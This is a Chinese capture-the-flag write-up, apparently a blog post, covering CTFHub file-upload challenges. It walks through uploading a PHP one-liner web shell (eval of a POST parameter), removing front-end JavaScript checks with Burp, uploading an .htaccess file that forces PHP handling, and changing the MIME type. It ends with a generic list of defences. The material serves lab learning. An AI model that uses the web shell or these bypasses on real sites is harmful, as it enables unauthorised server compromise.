CTFHUB——web——文件上传

无验证

根据题目“无验证”可知,对上传文件没有进行任何验证
上传一句话木马,再用蚁剑进行连接

<?php
@eval($_POST['a']
?>

其中post的值可以随意更改
在这里插入图片描述
在地址后面添加上传文件相对路径,密码是post的值
在这里插入图片描述
连接
在这里插入图片描述
在这里插入图片描述


前端验证

根据题目以及代码文件分析得,题目考察的是JS前端验证,绕过JS验证即可

在这里插入图片描述
在这里插入图片描述
利用bp剔除响应JS,删除操作过程中得JS代码
编写一个一句话木马的php文件,上传,抓包
将remove all javascript勾选,forward
在这里插入图片描述
显示上传成功
在这里插入图片描述
在这里插入图片描述
用中国蚁剑进行连接,将相对路径添加到url地址后,接下来的步骤与第一题无验证一样
在这里插入图片描述


.htaccess

.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

查看代码
在这里插入图片描述
不允许上传的文件格式中有php,但是没有htaccess
编写一个.htaccess文件,文件内容为

SetHandler application/x-httpd-php

目的是将上传的文件当成php解析
:直接更改是无法将名称改成.htaccess的,打开记事本输入内容,另存为,文件名输入.htaccess,文件类型选择all,保存
在这里插入图片描述
上传
在这里插入图片描述
再上传一个有一句话木马的png文件
在这里插入图片描述
跟上两题一样,用蚁剑进行连接,得到flag
在这里插入图片描述


MIME绕过

在这里插入图片描述
上传一句话木马,抓包,对content-type后面的内容进行更改
在这里插入图片描述
在这里插入图片描述
点击forward,文件显示上传成功,用蚁剑进行连接,得到flag
在这里插入图片描述
在这里插入图片描述


00截断

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
您好!对于CTFHub文件上传问题,我可以给您一些基本的指导。 在CTFHub中,文件上传通常是一个常见的漏洞类型。攻击者可能会利用文件上传功能来上传恶意文件,从而执行远程代码或者获取系统权限。 为了防止文件上传漏洞,以下是一些防御措施: 1. 文件类型验证:在接收到上传文件之后,应该对文件类型进行验证。可以通过检查文件的扩展名或者文件的MIME类型来实现。确保只允许上传安全的文件类型,而拒绝上传可执行文件、脚本文件等危险文件类型。 2. 文件名验证:对于上传的文件名,应该进行严格的验证。确保文件名不包含特殊字符、路径遍历符号等,以防止攻击者利用文件名来绕过安全限制。 3. 文件内容验证:在接收到上传文件之后,应该对文件内容进行验证。可以使用防病毒软件或者对文件进行解析、分析来检查是否存在恶意代码。 4. 文件存储位置:上传的文件应该存储在一个安全的位置,并且不应该直接被网站访问。最好将上传的文件存储在非Web可访问的目录下,并通过后端逻辑来处理和访问这些文件。 5. 访问控制:对于上传文件的功能,应该限制只有授权用户才能使用。使用身份验证和授权机制,确保只有合法的用户可以上传文件。 这些是一些常见的防御措施,但是具体实施还需要根据具体的情况来定制。希望能对您有所帮助!如果您有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值